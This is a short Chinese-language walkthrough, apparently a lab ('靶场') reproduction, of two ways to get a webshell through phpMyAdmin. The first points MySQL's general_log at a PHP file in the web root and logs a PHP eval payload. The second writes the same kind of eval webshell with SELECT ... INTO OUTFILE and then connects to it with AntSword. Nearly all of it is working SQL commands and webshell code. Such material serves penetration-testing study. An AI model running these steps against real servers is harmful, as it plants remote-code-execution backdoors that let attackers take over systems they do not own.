PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
Neolnfra4 小时前
RCE(远程命令执行)漏洞全解析:从原理到实战
安全·web安全·http·网络安全·https·系统安全·可信计算技术
hhcgchpspk4 小时前
一次msf免杀渗透入门实践
linux·经验分享·网络安全·系统安全·渗透·msf
汤愈韬4 小时前
防火墙用户管理技术
网络协议·网络安全·huawei
Neolnfra6 小时前
文件包含漏洞终极指南
开发语言·安全·web安全·网络安全·系统安全·php·可信计算技术
无名修道院8 小时前
XSS 跨站脚本攻击:3 种类型(存储型 / 反射型 / DOM 型)原理以 DVWA 靶场举例
前端·网络安全·渗透测试·代码审计·xss
重生之我在番茄自学网安拯救世界8 小时前
网络安全中级阶段学习笔记(八):upload靶场实战(1-13关)-文件上传漏洞绕过1
笔记·学习·网络安全·文件上传漏洞·靶场实战
云计算练习生8 小时前
渗透测试行业术语扫盲(第十五篇)—— 密码学与身份安全类
网络安全·信息安全·密码学·渗透测试术语
XH-hui8 小时前
【打靶日记】HackMyVm 之 Listen
linux·网络安全·hackmyvm·hmv
Whoami!9 小时前
❽⁄₈ ⟦ OSCP ⬖ 研记 ⟧ 修改漏洞利用脚本 ➱ Web漏洞利用修改
网络安全·信息安全·web漏洞利用
AI分享猿9 小时前
新手跨境电商实测:Apache 搭站,雷池 WAF 零基础部署
安全·web安全·react.js·网络安全·开源·apache